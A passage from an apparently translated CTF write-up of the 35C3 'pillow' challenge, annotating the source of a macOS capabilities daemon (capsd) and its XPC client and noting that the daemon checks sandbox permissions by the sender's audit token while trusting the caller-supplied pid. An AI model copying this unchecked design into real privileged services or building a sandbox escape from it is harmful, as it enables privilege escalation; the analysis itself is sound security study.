class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// Set up XPC service</span></span><br><span class="line"><span class="type">xpc_connection_t</span> service = <span class="built_in">xpc_connection_create_mach_service</span>(<span class="string">&quot;net.saelo.capsd.xpc&quot;</span>, <span class="literal">NULL</span>, XPC_CONNECTION_MACH_SERVICE_LISTENER);</span><br><span class="line"><span class="built_in">xpc_connection_set_target_queue</span>(service, <span 
class="built_in">dispatch_get_main_queue</span>());</span><br><span class="line"></span><br><span class="line"><span class="built_in">xpc_connection_set_event_handler</span>(service, ^(<span class="type">xpc_object_t</span> connection) &#123;</span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">xpc_get_type</span>(connection) == XPC_TYPE_CONNECTION) &#123;</span><br><span class="line">        <span class="built_in">xpc_connection_set_target_queue</span>(connection, <span class="built_in">dispatch_get_main_queue</span>());</span><br><span class="line">        <span class="built_in">xpc_connection_set_event_handler</span>(connection, ^(<span class="type">xpc_object_t</span> msg) &#123;</span><br><span class="line">            [XPC_message_event_handler]</span><br><span class="line">        &#125;);</span><br><span class="line">        <span class="built_in">xpc_connection_resume</span>(connection);</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">        <span class="type">char</span>* description = <span class="built_in">xpc_copy_description</span>(connection);</span><br><span class="line">        <span class="built_in">os_log</span>(OS_LOG_DEFAULT, <span class="string">&quot;Received unexpected event: %&#123;public&#125;s\n&quot;</span>, description);</span><br><span class="line">        <span class="built_in">free</span>(description);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;);</span><br><span class="line"><span class="built_in">xpc_connection_resume</span>(service);</span><br></pre></td></tr></table></figure><p>The handler that actually processes each XPC message is shown below.</p><p>From the code, <strong>an incoming XPC message is expected to be a dictionary, <code>xpc_dictionary</code></strong>, with four keys: <code>action</code> (uint64_t), <code>pid</code> (int64_t), <code>operation</code> (string), and <code>argument</code> (string). The reply sent back to the caller is a dictionary containing a single <code>success</code> key-value pair.</p><figure 
class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> (<span class="built_in">xpc_get_type</span>(msg) == XPC_TYPE_DICTIONARY) &#123;</span><br><span class="line">    <span class="type">xpc_object_t</span> reply = <span class="built_in">xpc_dictionary_create_reply</span>(msg);</span><br><span class="line">    <span class="keyword">if</span> (!reply)</span><br><span class="line">        <span class="keyword">return</span>;</span><br><span class="line"></span><br><span class="line">    <span class="type">int</span> action = <span class="built_in">xpc_dictionary_get_uint64</span>(msg, <span class="string">&quot;action&quot;</span>);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> 
(action == ACTION_GRANT_CAPABILITY) &#123;</span><br><span class="line">        <span class="type">audit_token_t</span> creds;</span><br><span class="line">        <span class="comment">// TODO check xpc_dictionary_set_audit_token</span></span><br><span class="line">        <span class="built_in">xpc_dictionary_get_audit_token</span>(msg, &amp;creds);</span><br><span class="line">        <span class="type">pid_t</span> target = <span class="built_in">xpc_dictionary_get_int64</span>(msg, <span class="string">&quot;pid&quot;</span>);</span><br><span class="line">        <span class="type">const</span> <span class="type">char</span>* operation = <span class="built_in">xpc_dictionary_get_string</span>(msg, <span class="string">&quot;operation&quot;</span>);</span><br><span class="line">        <span class="type">const</span> <span class="type">char</span>* argument = <span class="built_in">xpc_dictionary_get_string</span>(msg, <span class="string">&quot;argument&quot;</span>);</span><br><span class="line"></span><br><span class="line">        <span class="keyword">if</span> (operation &amp;&amp; argument) &#123;</span><br><span class="line">            <span class="built_in">xpc_dictionary_set_bool</span>(reply, <span class="string">&quot;success&quot;</span>, <span class="built_in">grant_capability_internal</span>(creds, target, operation, argument) == KERN_SUCCESS);</span><br><span class="line">        &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">            <span class="built_in">xpc_dictionary_set_bool</span>(reply, <span class="string">&quot;success&quot;</span>, <span class="literal">false</span>);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125; <span class="keyword">else</span> <span class="keyword">if</span> (action == ACTION_HAS_CAPABILITY) &#123;</span><br><span class="line">        <span class="type">pid_t</span> target = <span class="built_in">xpc_dictionary_get_int64</span>(msg, <span 
class="string">&quot;pid&quot;</span>);</span><br><span class="line">        <span class="type">const</span> <span class="type">char</span>* operation = <span class="built_in">xpc_dictionary_get_string</span>(msg, <span class="string">&quot;operation&quot;</span>);</span><br><span class="line">        <span class="type">const</span> <span class="type">char</span>* argument = <span class="built_in">xpc_dictionary_get_string</span>(msg, <span class="string">&quot;argument&quot;</span>);</span><br><span class="line">        <span class="built_in">xpc_dictionary_set_bool</span>(reply, <span class="string">&quot;success&quot;</span>, <span class="built_in">has_capability_internal</span>(target, operation, argument));</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">        <span class="built_in">xpc_dictionary_set_bool</span>(reply, <span class="string">&quot;success&quot;</span>, <span class="literal">false</span>);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="built_in">xpc_connection_send_message</span>(connection, reply);</span><br><span class="line">&#125; <span class="keyword">else</span> &#123;</span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">xpc_get_type</span>(msg) != XPC_TYPE_ERROR || msg != XPC_ERROR_CONNECTION_INVALID) &#123;</span><br><span class="line">        <span class="type">char</span>* description = <span class="built_in">xpc_copy_description</span>(msg);</span><br><span class="line">        <span class="built_in">os_log</span>(OS_LOG_DEFAULT, <span class="string">&quot;Received unexpected event on connection: %&#123;public&#125;s\n&quot;</span>, description);</span><br><span class="line">        <span class="built_in">free</span>(description);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>Depending on the incoming XPC 
request, the handler performs one of two operations: <strong>granting a capability</strong> or <strong>checking whether a capability is currently held</strong>.</p><p>Note the two functions the handler calls: <code>grant_capability_internal</code> and <code>has_capability_internal</code>.</p></li></ul><h5 id="2-has-grand-capability-函数">2) The has/grant_capability functions</h5><p><code>has_capability</code> and <code>grant_capability</code> are never called directly within <code>capsd.c</code>; they are the implementations of the MIG remote-call routines declared earlier.</p><p>As the code shows, both functions simply forward to the <code>*_internal</code> functions mentioned above, so the Mach server and the XPC service in capsd ultimately expose exactly the same two operations to clients.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">kern_return_t</span> <span class="title">grant_capability</span><span class="params">(<span class="type">mach_port_t</span> server, <span class="type">audit_token_t</span> token, <span class="type">pid_t</span> target, <span class="type">const</span> <span class="type">char</span>* op, <span class="type">const</span> <span class="type">char</span>* arg)</span> </span>&#123;</span><br><span class="line">    <span class="keyword">return</span> <span class="built_in">grant_capability_internal</span>(token, target, op, arg);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">kern_return_t</span> <span class="title">has_capability</span><span class="params">(<span class="type">mach_port_t</span> server, <span class="type">pid_t</span> pid, <span class="type">const</span> <span class="type">char</span>* op, <span class="type">const</span> <span class="type">char</span>* arg, <span class="type">int</span>* out)</span> </span>&#123;</span><br><span class="line">    *out = <span 
class="built_in">has_capability_internal</span>(pid, op, arg);</span><br><span class="line">    <span class="keyword">return</span> KERN_SUCCESS;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><h5 id="3-get-or-create-capabilities-for-pid-函数">3) The get_or_create_capabilities_for_pid function</h5><p>This function is a helper for the two internal functions. Recall the <strong>global variable capabilities_by_pid</strong>, a <strong>dictionary</strong> that is <strong>initialized in main</strong>? This function looks up entries in it or adds new ones.</p><p>The function is short, so here is the code first:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">CFMutableDictionaryRef <span class="title">get_or_create_capabilities_for_pid</span><span class="params">(<span class="type">pid_t</span> pid)</span> </span>&#123;</span><br><span 
class="line">    <span class="comment">// Check if the process exists. This is racy though...</span></span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">kill</span>(pid, <span class="number">0</span>) != <span class="number">0</span> &amp;&amp; errno == ESRCH) &#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="literal">NULL</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">// Create a CFNumber key initialized to the given pid</span></span><br><span class="line">    CFNumberRef key = <span class="built_in">CFNumberCreate</span>(kCFAllocatorDefault, kCFNumberSInt32Type, &amp;pid);</span><br><span class="line">    <span class="comment">// Declare a CF dictionary reference; note that this is only a reference</span></span><br><span class="line">    CFMutableDictionaryRef capabilities;</span><br><span class="line">    <span class="comment">/* Check whether this key is already in the capabilities_by_pid dictionary (i.e. whether this pid was added before).</span></span><br><span class="line"><span class="comment">       If so, store a reference to its value (itself a dictionary) in the capabilities variable */</span></span><br><span class="line">    <span class="keyword">if</span> (!<span class="built_in">CFDictionaryGetValueIfPresent</span>(capabilities_by_pid, key, (<span class="type">const</span> <span class="type">void</span>**)&amp;capabilities)) &#123;</span><br><span class="line">        <span class="comment">// The pid is not in the global dictionary yet, so create a value for it</span></span><br><span class="line">        capabilities = <span class="built_in">CFDictionaryCreateMutable</span>(kCFAllocatorDefault, <span class="number">0</span>, &amp;kCFTypeDictionaryKeyCallBacks, &amp;kCFTypeDictionaryValueCallBacks);</span><br><span class="line">        <span class="comment">// and store the key/value pair in the global dictionary</span></span><br><span class="line">        <span class="built_in">CFDictionaryAddValue</span>(capabilities_by_pid, key, capabilities);</span><br><span class="line">        <span 
class="built_in">CFRelease</span>(capabilities);</span><br><span class="line">        <span class="comment">// This part is a little tricky: it registers a handler that removes the stored key/value pair once the target process exits</span></span><br><span class="line">        <span class="type">dispatch_source_t</span> source = <span class="built_in">dispatch_source_create</span>(DISPATCH_SOURCE_TYPE_PROC, pid, DISPATCH_PROC_EXIT, <span class="built_in">dispatch_get_main_queue</span>());</span><br><span class="line">        <span class="built_in">dispatch_source_set_event_handler</span>(source, ^&#123;</span><br><span class="line">            <span class="built_in">os_log</span>(OS_LOG_DEFAULT, <span class="string">&quot;cleaning up capabilities for dead client %d&quot;</span>, pid);</span><br><span class="line"></span><br><span class="line">            <span class="built_in">CFDictionaryRemoveValue</span>(capabilities_by_pid, key);</span><br><span class="line"></span><br><span class="line">            <span class="built_in">CFRelease</span>(key);</span><br><span class="line"></span><br><span class="line">            <span class="built_in">dispatch_source_cancel</span>(source);</span><br><span class="line">            <span class="built_in">dispatch_release</span>(source);</span><br><span class="line">        &#125;);</span><br><span class="line">        <span class="built_in">dispatch_resume</span>(source);</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">        <span class="comment">// The pid already exists: nothing else to do, the capabilities dictionary fetched for it is returned to the caller</span></span><br><span class="line">        <span class="built_in">CFRelease</span>(key);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">// Either way, this returns the value dictionary stored in the global dictionary for the given key</span></span><br><span class="line">    <span class="keyword">return</span> capabilities;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>The function first checks <strong>whether the process with the given pid is still alive</strong>. If the target process is already dead, there is no point in creating a capability dictionary for it.</p><blockquote><p>Sending <strong>signal 0</strong> to a process <strong>delivers no signal at all</strong>, but error checking is still performed.</p><p>ESRCH here is the error code for <strong>no such process</strong>. If the given pid does not exist, <code>kill(pid, 0)</code> returns -1 with errno set to ESRCH.</p></blockquote><p>If the process is alive, the function checks <strong>whether the global dictionary already holds an entry for the target pid</strong>. If so, it returns a <strong>reference</strong> to that value to the caller; otherwise it creates a new <strong>(pid, capabilities) key/value pair</strong>, inserts it into the global dictionary, and returns a <strong>reference</strong> to the value.</p><h5 id="4-grant-capability-internal-函数">4) The grant_capability_internal function</h5><p>grant_capability_internal is arguably the core function of capsd, yet its code is also short:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">kern_return_t</span> <span class="title">grant_capability_internal</span><span class="params">(<span class="type">audit_token_t</span> token, <span class="type">pid_t</span> target, <span class="type">const</span> <span class="type">char</span>* op, <span class="type">const</span> <span class="type">char</span>* arg)</span> </span>&#123;</span><br><span class="line">    <span class="comment">// Ask the sandbox whether the process identified by token is allowed the operation described by op and arg</span></span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">sandbox_check_by_audit_token</span>(token, op, SANDBOX_CHECK_NO_REPORT, arg, <span class="literal">NULL</span>, <span class="literal">NULL</span>, <span class="literal">NULL</span>) == <span class="number">0</span>) &#123;</span><br><span class="line">        <span class="comment">// The check passed: get or create the capabilities dictionary for the given pid</span></span><br><span class="line">        CFMutableDictionaryRef capabilities = <span class="built_in">get_or_create_capabilities_for_pid</span>(target);</span><br><span class="line">        <span class="keyword">if</span> (!capabilities)</span><br><span class="line">            <span class="keyword">return</span> KERN_FAILURE;</span><br><span class="line">        <span class="comment">// Convert the given op and arg to CFStringRef</span></span><br><span class="line">        CFStringRef operation = <span class="built_in">CFStringCreateWithCString</span>(kCFAllocatorDefault, op, kCFStringEncodingASCII);</span><br><span class="line">        CFStringRef argument = <span class="built_in">CFStringCreateWithCString</span>(kCFAllocatorDefault, arg, kCFStringEncodingASCII);</span><br><span class="line">        <span class="comment">// Try to fetch the arguments set stored under the operation key in capabilities</span></span><br><span class="line">        CFMutableSetRef arguments;</span><br><span class="line">        <span class="keyword">if</span> (!<span class="built_in">CFDictionaryGetValueIfPresent</span>(capabilities, operation, (<span class="type">const</span> <span class="type">void</span>**)&amp;arguments)) &#123;</span><br><span class="line">            <span class="comment">// None yet: create a new arguments set and insert it into capabilities</span></span><br><span class="line">            arguments = <span class="built_in">CFSetCreateMutable</span>(kCFAllocatorDefault, <span class="number">0</span>, &amp;kCFTypeSetCallBacks);</span><br><span class="line">       
     <span class="built_in">CFDictionaryAddValue</span>(capabilities, operation, arguments);</span><br><span class="line">            <span class="built_in">CFRelease</span>(arguments);</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="comment">// Insert the new argument into the arguments set stored under the operation key in capabilities</span></span><br><span class="line">        <span class="built_in">CFSetSetValue</span>(arguments, argument);</span><br><span class="line"></span><br><span class="line">        <span class="built_in">CFRelease</span>(operation);</span><br><span class="line">        <span class="built_in">CFRelease</span>(argument);</span><br><span class="line">        <span class="keyword">return</span> KERN_SUCCESS;</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">        <span class="keyword">return</span> KERN_FAILURE;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>At this point we can lay out all the data structures involved:</p><ul><li><p>Structure of the XPC message received by the server</p><figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="punctuation">&#123;</span></span><br><span class="line">    <span class="attr">&quot;action&quot;</span> <span class="punctuation">:</span> ACTION_GRANT_CAPABILITY / ACTION_HAS_CAPABILITY<span class="punctuation">,</span></span><br><span class="line">    <span class="attr">&quot;pid&quot;</span> <span class="punctuation">:</span> target pid (int64)<span class="punctuation">,</span></span><br><span class="line">    <span class="attr">&quot;operation&quot;</span> <span class="punctuation">:</span> <span class="string">&quot;str type operation&quot;</span><span class="punctuation">,</span></span><br><span class="line">    <span class="attr">&quot;argument&quot;</span> <span class="punctuation">:</span> <span class="string">&quot;str type 
argument&quot;</span></span><br><span class="line"><span class="punctuation">&#125;</span></span><br></pre></td></tr></table></figure></li><li><p>Structure of the reply sent back by the server</p><figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="punctuation">&#123;</span></span><br><span class="line">  <span class="attr">&quot;success&quot;</span> <span class="punctuation">:</span> <span class="number">0</span>/<span class="number">1</span></span><br><span class="line"><span class="punctuation">&#125;</span></span><br></pre></td></tr></table></figure></li><li><p>Structure of the global dictionary <code>capabilities_by_pid</code>:</p><figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line"><span class="punctuation">&#123;</span></span><br><span class="line">    pid_1 <span class="punctuation">:</span> <span class="punctuation">[</span></span><br><span class="line">        operation_1 <span 
class="punctuation">:</span> <span class="punctuation">[</span></span><br><span class="line">            argument_1,</span><br><span class="line">            argument_2,</span><br><span class="line">            ...</span><br><span class="line">        <span class="punctuation">]</span><span class="punctuation">,</span></span><br><span class="line">        operation_2 <span class="punctuation">:</span> <span class="punctuation">[</span></span><br><span class="line">            argument_1,</span><br><span class="line">            argument_2,</span><br><span class="line">            ...</span><br><span class="line">        <span class="punctuation">]</span><span class="punctuation">,</span></span><br><span class="line">        ...</span><br><span class="line">    <span class="punctuation">]</span><span class="punctuation">,</span></span><br><span class="line">    pid_2 <span class="punctuation">:</span> <span class="punctuation">[</span></span><br><span class="line">        operation_1 <span class="punctuation">:</span> <span class="punctuation">[</span></span><br><span class="line">            argument_1,</span><br><span class="line">            argument_2,</span><br><span class="line">            ...</span><br><span class="line">        <span class="punctuation">]</span><span class="punctuation">,</span></span><br><span class="line">        operation_2 <span class="punctuation">:</span> <span class="punctuation">[</span></span><br><span class="line">            argument_1,</span><br><span class="line">            argument_2,</span><br><span class="line">            ...</span><br><span class="line">        <span class="punctuation">]</span><span class="punctuation">,</span></span><br><span class="line">        ...</span><br><span class="line">    <span class="punctuation">]</span><span class="punctuation">,</span></span><br><span class="line">    ...</span><br><span class="line"><span class="punctuation">&#125;</span></span><br></pre></td></tr></table></figure></li></ul><p>But that is not the main point. Note that the first argument of <code>sandbox_check_by_audit_token</code>, token, is passed in through grant_capability_internal:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">kern_return_t</span> <span class="title">grant_capability_internal</span><span class="params">(<span class="type">audit_token_t</span> token, <span class="type">pid_t</span> target, <span class="type">const</span> <span class="type">char</span>* op, <span class="type">const</span> <span class="type">char</span>* arg)</span> </span>&#123;</span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">sandbox_check_by_audit_token</span>(token, op, SANDBOX_CHECK_NO_REPORT, arg, <span class="literal">NULL</span>, <span class="literal">NULL</span>, <span class="literal">NULL</span>) == <span class="number">0</span>) &#123;</span><br><span class="line">        ...</span><br><span class="line">    &#125;</span><br><span class="line">    ...</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>And the first argument of grant_capability_internal is tied directly to the <strong>message sender</strong>:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">audit_token_t</span> creds;</span><br><span class="line"><span class="comment">// TODO check xpc_dictionary_set_audit_token</span></span><br><span class="line"><span 
class="built_in">xpc_dictionary_get_audit_token</span>(msg, &amp;creds);</span><br><span class="line">...</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> (...) &#123;</span><br><span class="line">    <span class="built_in">xpc_dictionary_set_bool</span>(reply, <span class="string">&quot;success&quot;</span>, <span class="built_in">grant_capability_internal</span>(creds, ...) == KERN_SUCCESS);</span><br><span class="line">&#125; </span><br><span class="line">...</span><br></pre></td></tr></table></figure><p>So the pid passed to grant_capability_internal <strong>serves only as a key</strong>; what is actually used for the sandbox check is the <strong>audit token</strong>. Under normal circumstances the sender's pid should match the pid in the request (that is, the sender should send its own PID to the service).</p><p>Finally, a few words on <code>sandbox_check_by_audit_token</code>, for which there is almost no documentation available:</p><ul><li><p>Purpose: <strong>checks whether an operation is allowed within the sandbox</strong>; returns <strong>0</strong>, i.e. <code>DECISION_ALLOW</code>, if it is.</p></li><li><p>Function definition:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">extern</span> <span class="type">int</span> SANDBOX_CHECK_NO_REPORT;</span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">sandbox_check_by_audit_token</span><span class="params">(<span class="type">audit_token_t</span> token, <span class="type">const</span> <span class="type">char</span>* operation, <span class="type">int</span> flags, ...)</span></span>;</span><br></pre></td></tr></table></figure></li><li><p>Function parameters:</p><ul><li>flags is usually <code>SANDBOX_CHECK_NO_REPORT</code>, which means the sandbox permission is checked <strong>silently</strong>, without emitting any output.</li><li>operation points to a <strong>sandbox permission rule string</strong> (sandbox profiles are written in a Scheme-like language, so knowing Scheme syntax helps); more useful examples of sandbox rules can be found in <a href="https://wiki.mozilla.org/Sandbox/OS_X_Rule_Set">OSX Sandbox Rule Set</a>.</li><li>The contents of the <code>var_args</code> after flags depend on <code>operation</code>, for example:<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// mach-lookup com.apple....</span></span><br><span class="line"><span class="type">int</span> port_denied = <span class="built_in">sandbox_check</span>(pid, <span class="string">&quot;mach-lookup&quot;</span>, SANDBOX_CHECK_NO_REPORT, <span class="string">&quot;com.apple....&quot;</span>);</span><br><span class="line">  </span><br><span class="line"><span class="comment">// file-read-data path/to/file</span></span><br><span class="line"><span class="type">int</span> read_denied = <span class="built_in">sandbox_check</span>(pid, <span class="string">&quot;file-read-data&quot;</span>, SANDBOX_CHECK_NO_REPORT, <span class="string">&quot;path/to/file&quot;</span>);</span><br></pre></td></tr></table></figure></li></ul></li></ul><h4 id="c-client-c">c. 
client.c</h4><p>The client's operations are simple, so no further explanation is given here:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">int</span> <span class="title">main</span><span class="params">(<span class="type">int</span> argc, <span class="type">const</span> <span class="type">char</span> *argv[])</span> </span>&#123;</span><br><span class="line">    <span class="comment">// Set up an XPC connection to capsd</span></span><br><span class="line">    <span class="type">xpc_connection_t</span> connection = <span class="built_in">xpc_connection_create_mach_service</span>(<span class="string">&quot;net.saelo.capsd.xpc&quot;</span>, <span class="literal">NULL</span>, <span class="number">0</span>);</span><br><span class="line">    <span class="built_in">xpc_connection_set_event_handler</span>(connection, ^(<span class="type">xpc_object_t</span> event) &#123;</span><br><span class="line">    &#125;);</span><br><span class="line">    <span class="built_in">xpc_connection_resume</span>(connection);</span><br><span class="line"></span><br><span class="line">    <span class="type">pid_t</span> 
pid;</span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">&quot;Enter pid:&quot;</span>);</span><br><span class="line">    <span class="built_in">scanf</span>(<span class="string">&quot;%d&quot;</span>, &amp;pid);</span><br><span class="line"></span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;Adding capability &#x27;process-exec*&#x27; for resource &#x27;/bin/bash&#x27; to process %d\n&quot;</span>, pid);</span><br><span class="line">    <span class="comment">// Build the XPC message dictionary</span></span><br><span class="line">    <span class="type">xpc_object_t</span> msg = <span class="built_in">xpc_dictionary_create</span>(<span class="literal">NULL</span>, <span class="literal">NULL</span>, <span class="number">0</span>);</span><br><span class="line">    <span class="built_in">xpc_dictionary_set_uint64</span>(msg, <span class="string">&quot;action&quot;</span>, ACTION_GRANT_CAPABILITY);</span><br><span class="line">    <span class="built_in">xpc_dictionary_set_int64</span>(msg, <span class="string">&quot;pid&quot;</span>, pid);</span><br><span class="line">    <span class="built_in">xpc_dictionary_set_string</span>(msg, <span class="string">&quot;operation&quot;</span>, <span class="string">&quot;process-exec*&quot;</span>);</span><br><span class="line">    <span class="built_in">xpc_dictionary_set_string</span>(msg, <span class="string">&quot;argument&quot;</span>, <span class="string">&quot;/bin/bash&quot;</span>);</span><br><span class="line">    <span class="comment">// Send it and wait for the server's reply</span></span><br><span class="line">    <span class="type">xpc_object_t</span> reply = <span class="built_in">xpc_connection_send_message_with_reply_sync</span>(connection, msg);</span><br><span class="line">    <span class="comment">// Print the reply</span></span><br><span class="line">    <span class="type">char</span>* description = <span class="built_in">xpc_copy_description</span>(reply);</span><br><span 
class="line">    <span class="built_in">printf</span>(<span class="string">&quot;Reply: %s\n&quot;</span>, description);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>Output when run:</p><p><img src="/2022/01/35c3ctf_pillow/image-20220108135557134.png" alt="image-20220108135557134"></p><h4 id="d-功能">d. Functionality</h4><p>Putting the code above together, capsd exposes the same two interfaces, <code>grant_capability</code> and <code>has_capability</code>, over both mach IPC and XPC.</p><p><code>grant_capability</code> checks whether the sandbox permission requested is allowed for the <strong>message sender</strong>; if it is, the permission is added to the <strong>global dictionary</strong>.</p><blockquote><p>The grant operation only means adding the requested op and arg to the global dictionary; no new permission is actually granted.</p></blockquote><p>When a later request asks whether some pid holds a particular sandbox permission (<code>has_capability</code>), capsd only checks whether the previously stored op and arg are present in the global dictionary and answers accordingly.</p><p>Next, let's look at shelld.</p><h3 id="2-shelld">2. shelld</h3><h4 id="a-shelld-defs">a. shelld.defs</h4><p>Four interfaces are defined here: <code>shelld_create_session</code>, <code>shell_exec</code>, <code>register_completion_listener</code> and <code>unregister_completion_listener</code>. How they are used is covered later; the defs alone do not reveal much.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">subsystem shelld <span 